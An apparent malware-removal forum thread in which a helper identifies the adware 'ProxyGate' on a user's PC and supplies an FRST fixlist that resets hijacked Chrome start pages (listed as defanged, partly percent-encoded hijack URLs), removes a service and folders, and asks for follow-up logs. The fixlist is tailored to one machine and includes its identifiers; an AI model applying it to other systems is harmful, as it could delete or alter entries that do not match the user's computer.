(vikijulia) #11

http://www.wklej.org/id/3311793/
http://www.wklej.org/id/3311796/
http://www.wklej.org/id/3311797/


(Atis) #12

You have installed a new malicious program called ProxyGate.
Uninstall Online.io Application and ProxyGate.

Paste into the system Notepad and save as a text file named fixlist:

SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1002 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 
SearchScopes: HKU\S-1-5-21-642829381-2403430992-544897393-1002 -> {F8E37551-92D3-4997-9405-A41E3E1E09AD} URL = 
CHR HomePage: ChromeDefaultData -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7wa3NrDm1QrMo3bwG72ynFY-9K2XQMhCayRZ-dlyVM2YyJHL35Le0r9QoWxTs0Q0aIS6k8GQSBxu1S9hjH4rz-8dyr5POqo48WvUuagTmeyeP6whkiRTJ50ubRfsLrQwwAU3oz8jwBIPaciuHLUgiGFoMjg,,
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.trotux.com/?z=d287e53564c55992ed1f41bg7z3b4b7c2b8c1w9c8m&from=icb&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176&type=hp","hxxp://www.startpageing123.com/?type=hp&ts=1488483404&z=f5c4349d419ed402ccf75aeg7z5b2bczbbfc5cdtdt&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD212176"
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) <==== ATTENTION
2017-11-21 19:06 - 2017-11-21 19:06 - 000000103 _____ C:\WINDOWS\SysWOW64\del.bat
2017-11-21 19:03 - 2017-11-21 19:04 - 000000000 ____D C:\Program Files (x86)\ProxyGate
2017-11-20 16:51 - 2017-11-20 16:52 - 000000000 ____D C:\AdwCleaner
DeleteQuarantine:
EmptyTemp:

Run FRST and click Fix. Show the Fixlog removal report.
Click Scan and show the new FRST report without Addition and Shortcut.